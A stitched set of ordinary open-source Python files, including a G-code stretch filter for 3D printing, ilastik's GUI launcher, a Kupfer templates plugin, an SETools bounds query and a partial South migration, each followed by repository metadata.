self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.EXTRUSION_OFF_MARKER in self.lines[lineIndex].raw:
return lineIndex - 2
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class LineIteratorForward(LineIteratorForwardLegacy):
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward (modern)")
for lineIndex in xrange(self.line_index - 1, -1, - 1):
if StretchFilter.LOOP_START_MARKER in self.lines[lineIndex].raw:
return lineIndex + 1
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class CuraLineIteratorForward(LineIteratorForwardLegacy):
def __init__(self, line_index, lines):
super(CuraLineIteratorForward, self).__init__(line_index, lines)
self.stop_on_extrusion_off = False
def index_setup(self):
if StretchFilter.LOOP_STOP_MARKER in self.lines[self.line_index].raw:
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index just after the activate command."""
self.logger.debug("reset index forward (modern)")
for lineIndex in xrange(self.line_index - 1, -1, - 1):
if StretchFilter.LOOP_START_MARKER in self.lines[lineIndex].raw:
return lineIndex
print('This should never happen in stretch, no activate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class LineIteratorBackward(LineIteratorBackwardLegacy):
def index_setup(self):
if self.line_index < 0:
self.line_index = self.reset_index_on_limit()
elif StretchFilter.LOOP_START_MARKER in self.lines[self.line_index + 1].raw: # if just before a loop start
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward (modern)")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.EXTRUSION_OFF_MARKER in self.lines[lineIndex].raw:
return lineIndex - 2
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class CuraLineIteratorBackward(LineIteratorBackwardLegacy):
def __init__(self, line_index, lines):
super(CuraLineIteratorBackward, self).__init__(line_index, lines)
self.stop_on_extrusion_off = False
def index_setup(self):
if self.line_index < 0:
self.line_index = self.reset_index_on_limit()
elif StretchFilter.LOOP_START_MARKER in self.lines[self.line_index + 1].raw: # if just before a loop start
self.line_index = self.reset_index_on_limit()
def reset_index_on_limit(self):
"""Get index two lines before the deactivate command."""
self.logger.debug("reset index backward (modern)")
for lineIndex in xrange(self.line_index + 1, len(self.lines)):
if StretchFilter.LOOP_STOP_MARKER in self.lines[lineIndex].raw:
return lineIndex - 1
print('This should never happen in stretch, no deactivate command was found for this thread.')
raise StopIteration("You've reached the end of the line.")
class StretchRepository:
"""A class to handle the stretch settings."""
def __init__(self, cross_limit_distance_over_edge_width=5.0, loop_stretch_over_edge_width=0.11,
edge_inside_stretch_over_edge_width=0.32, edge_outside_stretch_over_edge_width=0.1,
stretch_from_distance_over_edge_width=2.0, stretch_strength=1.0, **kwargs):
"""Set the default settings."""
# Cross Limit Distance Over Perimeter Width (ratio)
self.crossLimitDistanceOverEdgeWidth = cross_limit_distance_over_edge_width
self.loopStretchOverEdgeWidth = loop_stretch_over_edge_width * stretch_strength
self.edgeInsideStretchOverEdgeWidth = edge_inside_stretch_over_edge_width * stretch_strength
self.edgeOutsideStretchOverEdgeWidth = edge_outside_stretch_over_edge_width * stretch_strength
# Stretch From Distance Over Perimeter Width (ratio)
self.stretchFromDistanceOverEdgeWidth = stretch_from_distance_over_edge_width
class StretchFilter:
"""A class to stretch a skein of extrusions."""
EXTRUSION_ON_MARKER = 'stretch-extrusion-on'
EXTRUSION_OFF_MARKER = 'stretch-extrusion-off'
LOOP_START_MARKER = 'stretch-loop-start'
INNER_EDGE_START_MARKER = LOOP_START_MARKER + ' stretch-inner-edge-start'
OUTER_EDGE_START_MARKER = LOOP_START_MARKER + ' stretch-outer-edge-start'
LOOP_STOP_MARKER = 'stretch-loop-stop'
def __init__(self, **kwargs):
self.edgeWidth = 0.4
self.extruderActive = False
self.feedRateMinute = 959.0
self.isLoop = False
self.oldLocation = None
self.gcode = None
self.current_layer = None
self.line_number_in_layer = 0
self.stretchRepository = StretchRepository(**kwargs)
self.thread_maximum_absolute_stretch = 0
self.line_forward_iterator = LineIteratorForwardLegacy
self.line_backward_iterator = LineIteratorBackwardLegacy
def filter(self, gcode):
"""Parse gcode text and store the stretch gcode."""
self.gcode = gcode
self.setup_filter()
for self.current_layer_index, current_layer in enumerate(self.gcode.all_layers):
self.current_layer = current_layer[:]
for self.line_number_in_layer, line in enumerate(self.current_layer):
gcode_line = self.parse_line(line)
parse_coordinates(gcode_line, split(gcode_line))
self.gcode.all_layers[self.current_layer_index][self.line_number_in_layer] = gcode_line
def get_cross_limited_stretch(self, crossLimitedStretch, crossLineIterator, locationComplex):
"""Get cross limited relative stretch for a location."""
try:
line = crossLineIterator.get_next()
except StopIteration:
return crossLimitedStretch
pointComplex = get_location_from_line(self.oldLocation, line).dropAxis()
pointMinusLocation = locationComplex - pointComplex
pointMinusLocationLength = abs(pointMinusLocation)
if pointMinusLocationLength <= self.crossLimitDistanceFraction:
return crossLimitedStretch
parallelNormal = pointMinusLocation / pointMinusLocationLength
parallelStretch = dot_product(parallelNormal, crossLimitedStretch) * parallelNormal
if pointMinusLocationLength > self.crossLimitDistance:
return parallelStretch
crossNormal = complex(parallelNormal.imag, - parallelNormal.real)
crossStretch = dot_product(crossNormal, crossLimitedStretch) * crossNormal
crossPortion = (self.crossLimitDistance - pointMinusLocationLength) / self.crossLimitDistanceRemainder
return parallelStretch + crossStretch * crossPortion
def get_relative_stretch(self, locationComplex, lineIterator):
"""Get relative stretch for a location."""
lastLocationComplex = locationComplex
oldTotalLength = 0.0
pointComplex = locationComplex
totalLength = 0.0
while 1:
try:
line = lineIterator.get_next()
except StopIteration:
locationMinusPoint = locationComplex - pointComplex
locationMinusPointLength = abs(locationMinusPoint)
if locationMinusPointLength > 0.0:
return locationMinusPoint / locationMinusPointLength
return complex()
pointComplex = get_location_from_line(self.oldLocation, line).dropAxis()
locationMinusPoint = lastLocationComplex - pointComplex
locationMinusPointLength = abs(locationMinusPoint)
totalLength += locationMinusPointLength
logging.debug("total length: %d, stretchFromDistance: %f", totalLength, self.stretchFromDistance)
if totalLength >= self.stretchFromDistance:
distanceFromRatio = (self.stretchFromDistance - oldTotalLength) / locationMinusPointLength
totalPoint = distanceFromRatio * pointComplex + (1.0 - distanceFromRatio) * lastLocationComplex
locationMinusTotalPoint = locationComplex - totalPoint
return locationMinusTotalPoint / self.stretchFromDistance
lastLocationComplex = pointComplex
oldTotalLength = totalLength
def stretch_line(self, line):
"""Get stretched gcode line."""
location = get_location_from_line(self.oldLocation, line)
self.feedRateMinute = line.f or self.feedRateMinute
self.oldLocation = location
# if thread_maximum_absolute_stretch is set (ie within a loop) and we're extruding or after to do so,
# adjust the point location to account for stretching
if self.thread_maximum_absolute_stretch > 0.0:
return self.get_stretched_line_from_index_location(self.line_number_in_layer - 1,
self.line_number_in_layer + 1,
location,
line)
return line
def get_stretched_line_from_index_location(self, indexPreviousStart, indexNextStart, location, original_line):
"""Get stretched gcode line from line index and location."""
crossIteratorForward = self.line_forward_iterator(indexNextStart, self.current_layer)
crossIteratorBackward = self.line_backward_iterator(indexPreviousStart, self.current_layer)
iteratorForward = self.line_forward_iterator(indexNextStart, self.current_layer)
iteratorBackward = self.line_backward_iterator(indexPreviousStart, self.current_layer)
locationComplex = location.dropAxis()
logging.debug("original point to stretch: %s", locationComplex)
relativeStretch = self.get_relative_stretch(locationComplex, iteratorForward) \
+ self.get_relative_stretch(locationComplex, iteratorBackward)
relativeStretch *= 0.8
relativeStretch = self.get_cross_limited_stretch(relativeStretch, crossIteratorForward, locationComplex)
relativeStretch = self.get_cross_limited_stretch(relativeStretch, crossIteratorBackward, locationComplex)
relativeStretchLength = abs(relativeStretch)
if relativeStretchLength > 1.0:
relativeStretch /= relativeStretchLength
logging.debug("relativeStretchLength: %f", relativeStretchLength)
absoluteStretch = relativeStretch * self.thread_maximum_absolute_stretch
stretchedPoint = location.dropAxis() + absoluteStretch
result = Line()
result.command = original_line.command
result.x = stretchedPoint.real
result.y = stretchedPoint.imag
result.z = original_line.z
result.f = self.feedRateMinute
# TODO improve new extrusion length computation. It's clearly a very rough estimate
if original_line.e is not None:
result.e = original_line.e * (1 - abs(absoluteStretch))
unsplit(result)
logging.debug("stretched point: %f %f", result.x, result.y)
return result
def is_just_before_extrusion(self):
"""Determine if activate command is before linear move command."""
for line in self.current_layer[self.line_number_in_layer + 1:]:
if line.command in linear_move_gcodes or self.EXTRUSION_OFF_MARKER in line.raw:
return False
if self.EXTRUSION_ON_MARKER in line.raw:
return True
return False
def set_edge_width(self, edge_width):
# In the original code, the edge width found in the GCode was only used to recompute the
# stretchFromDistance.
# It does seem like either a typo or a hack around a problem I've yet to bump into.
# For now, I'll apply the edge width to recompute all distance related variables
self.edgeWidth = edge_width
self.crossLimitDistance = self.edgeWidth * self.stretchRepository.crossLimitDistanceOverEdgeWidth
self.loopMaximumAbsoluteStretch = self.edgeWidth * self.stretchRepository.loopStretchOverEdgeWidth
self.edgeInsideAbsoluteStretch = self.edgeWidth * self.stretchRepository.edgeInsideStretchOverEdgeWidth
self.edgeOutsideAbsoluteStretch = self.edgeWidth * self.stretchRepository.edgeOutsideStretchOverEdgeWidth
self.stretchFromDistance = self.stretchRepository.stretchFromDistanceOverEdgeWidth * self.edgeWidth
self.thread_maximum_absolute_stretch = 0
self.crossLimitDistanceFraction = self.crossLimitDistance / 3
self.crossLimitDistanceRemainder = self.crossLimitDistance - self.crossLimitDistanceFraction
def parse_line(self, line):
"""Parse a gcode line and add it to the stretch skein."""
# check for loop markers
if self.is_inner_edge_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.edgeInsideAbsoluteStretch
elif self.is_outer_edge_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.edgeOutsideAbsoluteStretch
elif self.is_loop_begin(line):
self.isLoop = True
self.thread_maximum_absolute_stretch = self.loopMaximumAbsoluteStretch
elif self.is_loop_end(line):
self.isLoop = False
self.set_stretch_to_path()
# handle move command if in loop
if line.command in linear_move_gcodes and self.isLoop and (line.x is not None or line.y is not None):
return self.stretch_line(line)
return line
def set_stretch_to_path(self):
"""Set the thread stretch to path stretch and is loop false."""
self.isLoop = False
self.thread_maximum_absolute_stretch = 0
def is_loop_begin(self, line):
return self.LOOP_START_MARKER in line.raw
def is_loop_end(self, line):
return self.LOOP_STOP_MARKER in line.raw
def is_inner_edge_begin(self, line):
return self.INNER_EDGE_START_MARKER in line.raw
def is_outer_edge_begin(self, line):
return self.OUTER_EDGE_START_MARKER in line.raw
def setup_filter(self):
raise NotImplementedError
class Slic3rStretchFilter(StretchFilter):
UNKNOWN = 0
EXTERNAL_PERIMETER = 1
EXTRA_PERIMETER = 2
EDGE_WIDTH_REGEXP = re.compile(r'; external perimeters extrusion width\s+=\s+([\.\d]+)mm')
def __init__(self, **kwargs):
StretchFilter.__init__(self, **kwargs)
self.line_forward_iterator = LineIteratorForward
self.line_backward_iterator = LineIteratorBackward
self.next_external_perimeter_is_outer = None
self.current_type_line = None
def new_perimeter(self, line, external=False):
if external:
if self.next_external_perimeter_is_outer:
logging.debug("found external perimeter outer")
line.raw += " ; " + StretchFilter.OUTER_EDGE_START_MARKER
self.next_external_perimeter_is_outer = False
else:
logging.debug("found external perimeter inner")
line.raw += " ; " + StretchFilter.INNER_EDGE_START_MARKER
if self.current_type_line != self.EXTERNAL_PERIMETER:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTERNAL_PERIMETER
else:
logging.debug("found extra perimeter")
line.raw += " ; " + StretchFilter.LOOP_START_MARKER
if self.EXTERNAL_PERIMETER == self.current_type_line:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTRA_PERIMETER
def setup_filter(self):
edge_width_found = False
extruding = False
for self.current_layer in self.gcode.all_layers:
self.next_external_perimeter_is_outer = True
self.current_type_line = self.UNKNOWN
for line_idx, line in enumerate(self.current_layer):
# checking extrusion
if not extruding and line.command in linear_move_gcodes and line.e is not None:
extruding = True
line.raw += " ; " + StretchFilter.EXTRUSION_ON_MARKER
elif extruding and line.command in linear_move_gcodes and line.e is None and self.current_type_line in (
self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
extruding = False
line.raw += " ; " + StretchFilter.EXTRUSION_OFF_MARKER
# checking perimeter type
if '; perimeter external' in line.raw:
if self.EXTERNAL_PERIMETER != self.current_type_line:
self.new_perimeter(line, True)
elif '; perimeter' in line.raw:
if self.EXTRA_PERIMETER != self.current_type_line:
self.new_perimeter(line)
elif '; move to first perimeter point' in line.raw:
# search if next perimeter is external or not
for loop_ahead_idx in xrange(line_idx + 1, len(self.current_layer)):
if '; perimeter external' in self.current_layer[loop_ahead_idx].raw:
self.new_perimeter(line, True)
break
elif '; perimeter' in self.current_layer[loop_ahead_idx].raw:
self.new_perimeter(line)
break
elif 'unretract' not in line.raw:
if self.current_type_line in (self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.UNKNOWN
# checking for edge width
match = self.EDGE_WIDTH_REGEXP.match(line.raw)
if match:
edge_width_found = True
self.set_edge_width(float(match.group(1)))
if self.current_type_line != self.UNKNOWN:
logging.warn("unfinished loop")
if not edge_width_found:
logging.warn("no edge width found in comments, picking a default value")
self.set_edge_width(0.4)
class CuraStretchFilter(StretchFilter):
UNKNOWN = 0
EXTERNAL_PERIMETER = 1
EXTRA_PERIMETER = 2
CURA_PROFILE_REGEXP = re.compile(r';CURA_PROFILE_STRING:(.*)$')
def __init__(self, **kwargs):
StretchFilter.__init__(self, **kwargs)
self.line_forward_iterator = CuraLineIteratorForward
self.line_backward_iterator = CuraLineIteratorBackward
def new_perimeter(self, line, external=False, outer=False):
if external:
if outer:
logging.debug("found external perimeter outer")
line.raw += " ; " + StretchFilter.OUTER_EDGE_START_MARKER
else:
logging.debug("found external perimeter inner")
line.raw += " ; " + StretchFilter.INNER_EDGE_START_MARKER
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTERNAL_PERIMETER
else:
logging.debug("found extra perimeter")
line.raw += " ; " + StretchFilter.LOOP_START_MARKER
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.EXTRA_PERIMETER
def setup_filter(self):
edge_width_found = False
extruding = False
for self.current_layer in self.gcode.all_layers:
self.current_type_line = self.UNKNOWN
next_line_marker = None
for line_idx, line in enumerate(self.current_layer):
# checking extrusion
if not extruding and line.command in linear_move_gcodes and line.e is not None:
extruding = True
line.raw += " ; " + StretchFilter.EXTRUSION_ON_MARKER
elif extruding and line.command in linear_move_gcodes and line.e is None and self.current_type_line in (
self.EXTRA_PERIMETER, self.EXTERNAL_PERIMETER):
extruding = False
line.raw += " ; " + StretchFilter.EXTRUSION_OFF_MARKER
if next_line_marker is not None:
self.new_perimeter(line, *next_line_marker)
next_line_marker = None
# checking perimeter type
if 'TYPE:WALL-OUTER' in line.raw:
self.stop_loop(line)
next_line_marker = (True, True)
elif 'TYPE:WALL-INNER' in line.raw:
self.stop_loop(line)
next_line_marker = (True, False)
elif 'TYPE:SKIN' in line.raw:
self.stop_loop(line)
next_line_marker = (False, False)
elif 'TYPE:FILL' in line.raw:
self.stop_loop(line)
# end loop if we reach the end of the current layer
if line_idx == len(self.current_layer) - 1:
self.stop_loop(line)
# checking for edge width
match = self.CURA_PROFILE_REGEXP.match(line.raw)
if match:
edge_width_found = self.parse_cura_profile(match.group(1))
if not edge_width_found:
logging.warn("no edge width found in comments, picking a default value")
self.set_edge_width(0.4)
def parse_cura_profile(self, cura_profile):
profileOpts, alt = zlib.decompress(base64.b64decode(cura_profile)).split('\f', 1)
for option in profileOpts.split('\b'):
if len(option) > 0:
key, value = option.split('=', 1)
logging.debug("found cura option %s = %s", key, value)
if key == 'nozzle_size':
self.set_edge_width(float(value))
return True
return False
def stop_loop(self, line):
if self.current_type_line != self.UNKNOWN:
logging.debug("found end of loop")
line.raw += " ; " + StretchFilter.LOOP_STOP_MARKER
self.current_type_line = self.UNKNOWN
class SkeinforgeStretchFilter(StretchFilter):
EDGE_WIDTH_REGEXP = re.compile(r'\(<edgeWidth> ([\.\d]+)')
def parse_initialisation_line(self, line):
# self.distanceFeedRate.search_decimal_places_carried(line.raw)
if line.raw == '(</extruderInitialization>)':
return True
match = self.EDGE_WIDTH_REGEXP.match(line.raw)
if match:
self.set_edge_width(float(match.group(1)))
return False
def setup_filter(self):
for self.current_layer in self.gcode.all_layers:
for line in self.current_layer:
self.parse_initialisation_line(line)
if line.command == 'M101':
line.raw += '; ' + self.EXTRUSION_ON_MARKER
elif line.command == 'M103':
line.raw += '; ' + self.EXTRUSION_OFF_MARKER
elif line.raw.startswith("(<loop>"):
line.raw += '; ' + self.LOOP_START_MARKER
elif line.raw.startswith("(<edge>") and not line.raw.startswith("(<edge> outer"):
line.raw += '; ' + self.INNER_EDGE_START_MARKER
elif line.raw.startswith("(<edge> outer"):
line.raw += '; ' + self.OUTER_EDGE_START_MARKER
elif line.raw.startswith("(</edge>)") or line.raw.startswith("(</loop>)"):
line.raw += '; ' + self.LOOP_STOP_MARKER
|
zeograd/gcodeutils
|
gcodeutils/stretch/stretch.py
|
Python
|
gpl-2.0
| 33,216
|
###############################################################################
# ilastik: interactive learning and segmentation toolkit
#
# Copyright (C) 2011-2014, the ilastik developers
# <team@ilastik.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# In addition, as a special exception, the copyright holders of
# ilastik give you permission to combine ilastik with applets,
# workflows and plugins which are not covered under the GNU
# General Public License.
#
# See the LICENSE file for details. License information is also available
# on the ilastik web site at:
# http://ilastik.org/license.html
###############################################################################
import os
import functools
import platform
#make the program quit on Ctrl+C
import signal
signal.signal(signal.SIGINT, signal.SIG_DFL)
from PyQt4.QtGui import QApplication
from PyQt4.QtCore import Qt, QTimer
import splashScreen
import ilastik.config
shell = None
def startShellGui(workflow_cmdline_args, eventcapture_mode, playback_args, *testFuncs):
"""
Create an application and launch the shell in it.
"""
"""
The next two lines fix the following xcb error on Ubuntu by calling X11InitThreads before loading the QApplication:
[xcb] Unknown request in queue while dequeuing
[xcb] Most likely this is a multi-threaded client and XInitThreads has not been called
[xcb] Aborting, sorry about that.
python: ../../src/xcb_io.c:178: dequeue_pending_request: Assertion !xcb_xlib_unknown_req_in_deq failed.
"""
platform_str = platform.platform().lower()
if 'ubuntu' in platform_str or 'fedora' in platform_str or 'debian' in platform_str:
QApplication.setAttribute(Qt.AA_X11InitThreads, True)
if ilastik.config.cfg.getboolean("ilastik", "debug"):
QApplication.setAttribute(Qt.AA_DontUseNativeMenuBar, True)
if eventcapture_mode is not None:
# Only use a special QApplication subclass if we are recording.
# Otherwise, it's a performance penalty for every event processed by Qt.
from eventcapture.eventRecordingApp import EventRecordingApp
app = EventRecordingApp.create_app(eventcapture_mode, **playback_args)
else:
app = QApplication([])
_applyStyleSheet(app)
splashScreen.showSplashScreen()
app.processEvents()
QTimer.singleShot( 0, functools.partial(launchShell, workflow_cmdline_args, *testFuncs ) )
QTimer.singleShot( 0, splashScreen.hideSplashScreen)
return app.exec_()
def _applyStyleSheet(app):
"""
Apply application-wide style-sheet rules.
"""
styleSheetPath = os.path.join( os.path.split(__file__)[0], 'ilastik-style.qss' )
with file( styleSheetPath, 'r' ) as f:
styleSheetText = f.read()
app.setStyleSheet(styleSheetText)
def launchShell(workflow_cmdline_args, *testFuncs):
"""
Start the ilastik shell GUI with the given workflow type.
Note: A QApplication must already exist, and you must call this function from its event loop.
"""
# This will import a lot of stuff (essentially the entire program).
# We use a late import here so the splash screen is shown while this lengthy import happens.
from ilastik.shell.gui.ilastikShell import IlastikShell
# Create the shell and populate it
global shell
shell = IlastikShell(None, workflow_cmdline_args)
assert QApplication.instance().thread() == shell.thread()
if ilastik.config.cfg.getboolean("ilastik", "debug"):
# In debug mode, we always start with the same size window.
# This is critical for recorded test cases.
shell.resize(1000, 750)
# Also, ensure that the window title bar doesn't start off screen,
# which can be an issue when using xvfb or vnc viewers
shell.move(10,10)
shell.show()
# FIXME: The workflow_cmdline_args parameter is meant
# for arguments to the workflow, not the shell.
# This is a bit hacky.
if workflow_cmdline_args and "--fullscreen" in workflow_cmdline_args:
workflow_cmdline_args.remove('--fullscreen')
shell.showMaximized()
# Run a test (if given)
for testFunc in testFuncs:
QTimer.singleShot(0, functools.partial(testFunc, shell) )
# On Mac, the main window needs to be explicitly raised
shell.raise_()
QApplication.instance().processEvents()
return shell
|
nielsbuwen/ilastik
|
ilastik/shell/gui/startShellGui.py
|
Python
|
gpl-3.0
| 4,687
|
__author__ = 'henla464'
import time
class LoraRadioMessageAndMetadata(object):
def __init__(self, loraRadioMessage):
self.loraRadioMessage = loraRadioMessage
self.timeCreated = time.monotonic()
def GetLoraRadioMessageRS(self):
return self.loraRadioMessage
def GetTimeCreated(self):
return self.timeCreated
|
henla464/WiRoc-Python-2
|
loraradio/LoraRadioMessageAndMetadata.py
|
Python
|
gpl-3.0
| 355
|
__kupfer_name__ = _("Document Templates")
__kupfer_sources__ = ("TemplatesSource", )
__kupfer_actions__ = ("CreateNewDocument", )
__description__ = _("Create new documents from your templates")
__version__ = ""
__author__ = "Ulrik Sverdrup <ulrik.sverdrup@gmail.com>"
import os
import gio
import glib
from kupfer.objects import Leaf, Action, Source, FileLeaf
from kupfer import icons, utils
from kupfer.obj import helplib
from kupfer.obj.helplib import FilesystemWatchMixin
from kupfer import plugin_support
DEFAULT_TMPL_DIR = "~/Templates"
class Template (FileLeaf):
def __init__(self, path):
basename = glib.filename_display_basename(path)
nameroot, ext = os.path.splitext(basename)
FileLeaf.__init__(self, path, _("%s template") % nameroot)
def get_actions(self):
yield CreateDocumentIn()
for a in FileLeaf.get_actions(self):
yield a
def get_gicon(self):
file_gicon = FileLeaf.get_gicon(self)
return icons.ComposedIcon("text-x-generic-template", file_gicon)
class EmptyFile (Leaf):
def __init__(self):
Leaf.__init__(self, None, _("Empty File"))
def repr_key(self):
return ""
def get_actions(self):
yield CreateDocumentIn()
def get_icon_name(self):
return "text-x-generic"
class NewFolder (Leaf):
def __init__(self):
Leaf.__init__(self, None, _("New Folder"))
def repr_key(self):
return ""
def get_actions(self):
yield CreateDocumentIn()
def get_icon_name(self):
return "folder"
class CreateNewDocument (Action):
def __init__(self):
Action.__init__(self, _("Create New Document..."))
def has_result(self):
return True
def activate(self, leaf, iobj):
if iobj.object is not None:
# Copy the template to destination directory
basename = os.path.basename(iobj.object)
tmpl_gfile = gio.File(iobj.object)
destpath = utils.get_destpath_in_directory(leaf.object, basename)
destfile = gio.File(destpath)
tmpl_gfile.copy(destfile, flags=gio.FILE_COPY_ALL_METADATA)
elif isinstance(iobj, NewFolder):
filename = unicode(iobj)
destpath = utils.get_destpath_in_directory(leaf.object, filename)
os.makedirs(destpath)
else:
# create new empty file
filename = unicode(iobj)
f, destpath = utils.get_destfile_in_directory(leaf.object, filename)
f.close()
return FileLeaf(destpath)
def item_types(self):
yield FileLeaf
def valid_for_item(self, leaf):
return leaf.is_dir()
def requires_object(self):
return True
def object_types(self):
yield Template
yield EmptyFile
yield NewFolder
def object_source(self, for_item=None):
return TemplatesSource()
def get_description(self):
return _("Create a new document from template")
def get_icon_name(self):
return "document-new"
class CreateDocumentIn(helplib.reverse_action(CreateNewDocument)):
rank_adjust = 10
def __init__(self):
Action.__init__(self, _("Create Document In..."))
class TemplatesSource (Source, FilesystemWatchMixin):
def __init__(self):
Source.__init__(self, _("Document Templates"))
@classmethod
def _get_tmpl_dir(self):
tmpl_dir = glib.get_user_special_dir(glib.USER_DIRECTORY_TEMPLATES)
if not tmpl_dir:
tmpl_dir = os.path.expanduser(DEFAULT_TMPL_DIR)
return tmpl_dir
def initialize(self):
self.monitor_token = self.monitor_directories(self._get_tmpl_dir())
def get_items(self):
tmpl_dir = self._get_tmpl_dir()
yield EmptyFile()
yield NewFolder()
try:
for fname in os.listdir(tmpl_dir):
yield Template(os.path.join(tmpl_dir, fname))
except EnvironmentError, exc:
self.output_error(exc)
def should_sort_lexically(self):
return True
def get_description(self):
return None
def get_icon_name(self):
return "system-file-manager"
def provides(self):
yield Template
|
cjparsons74/kupfer
|
kupfer/plugin/templates.py
|
Python
|
gpl-3.0
| 3,706
|
# Copyright 2016, Tresys Technology, LLC
#
# This file is part of SETools.
#
# SETools is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 2.1 of
# the License, or (at your option) any later version.
#
# SETools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SETools. If not, see
# <http://www.gnu.org/licenses/>.
#
import logging
import re
from .descriptors import CriteriaDescriptor, CriteriaSetDescriptor
from .policyrep import BoundsRuletype
from .query import PolicyQuery
from .util import match_regex
class BoundsQuery(PolicyQuery):
"""
Query *bounds statements.
Parameter:
policy The policy to query.
Keyword Parameters/Class attributes:
ruletype The rule type(s) to match.
"""
ruletype = CriteriaSetDescriptor(enum_class=BoundsRuletype)
parent = CriteriaDescriptor("parent_regex")
parent_regex = False
child = CriteriaDescriptor("child_regex")
child_regex = False
def __init__(self, policy, **kwargs):
super(BoundsQuery, self).__init__(policy, **kwargs)
self.log = logging.getLogger(__name__)
def results(self):
"""Generator which yields all matching *bounds statements."""
self.log.info("Generating bounds results from {0.policy}".format(self))
self.log.debug("Ruletypes: {0.ruletype}".format(self))
self.log.debug("Parent: {0.parent!r}, regex: {0.parent_regex}".format(self))
self.log.debug("Child: {0.child!r}, regex: {0.child_regex}".format(self))
for b in self.policy.bounds():
if self.ruletype and b.ruletype not in self.ruletype:
continue
if self.parent and not match_regex(
b.parent,
self.parent,
self.parent_regex):
continue
if self.child and not match_regex(
b.child,
self.child,
self.child_regex):
continue
yield b
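# Illustrative usage sketch; the policy path and type names are hypothetical
# and the import path assumes the public setools package layout:
#
#   from setools import SELinuxPolicy
#   p = SELinuxPolicy("policy.31")
#   q = BoundsQuery(p, ruletype=["typebounds"], parent="init_t", parent_regex=False)
#   for rule in q.results():
#       print(rule)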
|
TresysTechnology/setools
|
setools/boundsquery.py
|
Python
|
lgpl-2.1
| 2,406
|
from openturns import *
from otfftw import *
from time import time
# Create a process sample
dim = 1
n = 8
tg = RegularGrid(0.0, 1.0, n)
process = SpectralNormalProcess(CauchyModel(NumericalPoint(dim, 1), NumericalPoint(dim, 1)), tg)
# Sample size
size = 3
# Sample the process
sample = process.getSample(size)
# Welch factory
factory = WelchFactory()
# FFT algorithm
fft = FFTW()
# Use this fft in the spectral process
factory.setFFTAlgorithm(fft)
# Estimate the spectral model
spectralModel = factory.build(sample)
print "spectral model=", spectralModel
|
openturns/otfftw
|
doc/UC3_Welch.py
|
Python
|
gpl-3.0
| 564
|
import os
print("hello ACM\nWhat is your name??")
exitBool = True
def talk():
print("I'm sorry, " + name + ", but I can't do that")
anyKey1 = raw_input("\nPress any key to continue...")
os.system("clear")
name = raw_input()
print("Well hello there.")
while(exitBool):
print("\n\n\n\nWhat can I do for you, " + name + "?\n")
print(" 1. Create your robot interface for you\n")
print(" 2. Exit \n")
n = int(input("Answer: "))
if n == 1:
talk()
elif n == 2:
exitBool = False
else:
        print("I'm sorry, but " + str(n) + " is not an answer")
|
ChadJPetersen/RobotisCM-530WirelessProtocol
|
src/Controller/__init__.py
|
Python
|
gpl-2.0
| 617
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding unique constraint on 'SidPoint', fields ['sidtime', 'idx']
db.create_unique('clouds_sidpoint', ['sidtime_id', 'idx'])
def backwards(self, orm):
# Removing unique constraint on 'SidPoint', fields ['sidtime', 'idx']
db.delete_unique('clouds_sidpoint', ['sidtime_id', 'idx'])
models = {
'clouds.image': {
'Meta': {'object_name': 'Image'},
'datetime': ('django.db.models.fields.DateTimeField', [], {'unique': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'intensity': ('django.db.models.fields.BigIntegerField', [], {'null': 'True'}),
'sidtime': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['clouds.SidTime']", 'null': 'True'})
},
'clouds.line': {
'Meta': {'object_name': 'Line'},
'average_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'}),
'realpoint_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'sidpoint_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'stddev_flux': ('django.db.models.fields.FloatField', [], {'default': '0.0'})
},
'clouds.realpoint': {
'Meta': {'ordering': "['image__datetime']", 'object_name': 'RealPoint'},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'flux': ('django.db.models.fields.FloatField', [], {}),
